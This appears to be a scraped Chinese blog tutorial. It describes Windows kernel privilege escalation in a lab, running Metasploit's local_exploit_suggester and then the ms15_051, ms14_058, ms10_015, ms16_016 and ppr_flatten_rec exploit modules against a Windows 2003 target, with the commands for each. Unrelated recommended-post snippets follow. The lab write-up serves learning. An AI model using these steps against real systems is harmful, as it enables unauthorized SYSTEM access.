windows内核提权漏洞

环境:

Kali Linux(攻击机) 192.168.190.141

Windows2003SP2(靶机) 192.168.190.147

0x01寻找可利用的exp

实战中我们在拿到一个反弹shell后(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

如下图,有一个普通用户权限的会话

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

可以看到我这里有和目标机的一个session会话,id为4,我们使用local_exploit_suggester模块





use post/multi/recon/local_exploit_suggester

set LHOST 192.168.190.141

set SESSION 

Exploit








 


如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。




0x02 利用exp提权


根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。


选取了几个常见的可利用的模块来进行提权演示。


 


Windows ClientCopyImage Win32k Exploit(ms15_051)
Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。


 


使用模块 查看设置的参数




设置参数 提权




use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 

exploit






Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。




use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 

exploit
 






通过KiTrap0D进行Windows系统提权(ms10_015)
这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。




use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 

exploit






mrxdav.sys WebDav本地提权MS16-016
这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。




use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 

exploit






EPATHOBJ::pprFlattenRec本地提权
这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
而我们的这个脚本就是利用这个漏洞来提权的。


这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。




use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 

exploit
 




因为实验是sp2就没有成功


												


											
msf利用- windows内核提权漏洞的更多相关文章
	

    
								
  1. 9.CVE-2016-5195(脏牛)内核提权漏洞分析
		
    漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:脏牛(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2 ...
    
		
    2. 
						
  2. Linux本地内核提权漏洞复现(CVE-2019-13272)
		
    Linux本地内核提权漏洞复现(CVE-2019-13272) 一.漏洞描述 当调用PTRACE_TRACEME时,ptrace_link函数将获得对父进程凭据的RCU引用,然后将该指针指向get_c ...
    
		
    3. 
						
  3. CVE-2019-13272:Linux本地内核提权漏洞复现
		
    0x00 简介 2019年07月20日,Linux正式修复了一个本地内核提权漏洞.通过此漏洞,攻击者可将普通权限用户提升为Root权限. 0x01 漏洞概述 当调用PTRACE_TRACEME时,pt ...
    
		
    4. 
						
  4. Windows原理深入学习系列-Windows内核提权
		
    这是[信安成长计划]的第 22 篇文章 0x00 目录 0x01 介绍 0x02 替换 Token 0x03 编辑 ACL 0x04 修改 Privileges 0x05 参考文章 继续纠正网上文章中 ...
    
		
    5. 
						
  5. 新Windows本地提权漏洞学习(CVE-2019-0841)
		
    1.这是一个啥漏洞? 睁眼一看,妈呀本地提权,快加入本地提权漏洞利用包里,速度加入.github连接我就不发了.担心被认为是传播黑客工具,咱们在这里单纯学习一下漏洞的原理和部分源代码. 2.文件读写权 ...
    
		
    6. 
						
  6. Windows 10 提权漏洞复现及武器化利用
		
    项目地址:https://github.com/SandboxEscaper/randomrepo 相关工具的下载地址: Process Explorer:https://docs.microsoft ...
    
		
    7. 
						
  7. Linux内核提权漏洞(CVE-2019-13272)
		
    漏洞描述 kernel / ptrace.c中的ptrace_link错误地处理了想要创建ptrace关系的进程的凭据记录,这允许本地用户通过利用父子的某些方案来获取root访问权限 进程关系,父进程 ...
    
		
    8. 
						
  8. windows内核提权
		
    Windows by default are vulnerable to several vulnerabilities that could allow an attacker to execute ...
    
		
    9. 
						
  9. 2018-2019-2 20165215《网络对抗技术》Exp10 Final Windows本地内核提权+Exploit-Exercises Nebula学习与实践
		
    目录 PART ONE :Windows本地内核提权 漏洞概述 漏洞原理 漏洞复现 windbg调试本地内核 查看SSDT表和SSDTShadow表 查看窗口站结构体信息 利用Poc验证漏洞 漏洞利用 ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Spring Boot 自定义 Banner 教程
			
    我们在启动 SpringBoot 时,控制台会打印 SpringBoot Logo 以及版本信息.有的时候我们需要自己弄个有个性的文本图片.Spring Boot 为我们提供了自定义接口. . ___ ...
    
			
    2. 
						
  2. C#中使用StreamReader实现文本文件的读取与写入
			
    场景 实现一个 TextReader,使其以一种特定的编码从字节流中读取字符. 关注公众号霸道的程序猿获取编程相关电子书.教程推送与免费下载. 大量编程视频教程:https://space.bilib ...
    
			
    3. 
						
  3. [kuangbin带你飞]专题十六 KMP & 扩展KMP & Manacher 题解报告
			
    来刷kuangbin字符串了,字符串处理在ACM中是很重要的,一般比赛都会都1——2道有关字符串处理的题目,而且不会很难的那种,大多数时候都是用到一些KMP的性质或者找规律. 点击标题可跳转至VJ比赛 ...
    
			
    4. 
						
  4. 微信支付JSAPI支付
			
    1.介绍 JSAPI支付是用户在微信中打开商户的H5页面,商户在H5页面通过调用微信支付提供的JSAPI接口调起微信支付模块完成支付.应用场景有:    ◆ 用户在微信公众账号内进入商家公众号,打开某 ...
    
			
    5. 
						
  5. 在64系统里执行32位程序出现/lib/ld-linux.so.2: bad ELF interpreter: No such file or directory
			
    安装下glic即可 sudo yum install glibc.i686
    
			
    6. 
						
  6. C# 代码往oracle数据库添加datetime格式列
			
    C# 代码往oracle数据库添加datetime格式列时,不需要在insert语句中为datetime类型使用to_date函数
    
			
    7. 
						
  7. C++进程间通讯方式
			
    1.剪切板模式. 在MFC里新建两个文本框和两个按钮,点击发送按钮相当于复制文本框1的内容,点击接收按钮相当于粘贴到文本框2内: 发送和接收按钮处功能实现如下: void CClipboard2Dlg ...
    
			
    8. 
						
  8. electron教程(三): 使用ffi-napi引入C++的dll
			
    我的electron教程系列 electron教程(一): electron的安装和项目的创建 electron教程(二): http服务器, ws服务器, 进程管理 electron教程(三): 使 ...
    
			
    9. 
						
  9. 1.python环境配置 - python基础入门
			
    工欲善其事必先利其器,python学习首先要做得就是配置python环境.配置环境只需要下载Pycharm 和 Anaconda两个安装包即可,请跟上我得步伐,一步一步操作. 重要的事情说三遍: 先安 ...
    
			
    10. 
						
  10. 阿里云服务器ecs配置之安装jdk
			
    一.安装环境 操作系统:Centos 7.4 JDK版本:1.8 工具:Xshell5.Xftp5 二.安装步骤 第一步:下载安装包 (官网)链接: 下载适合自己系统的jdk版本,如图:我下载的是64 ...
    
			
    11.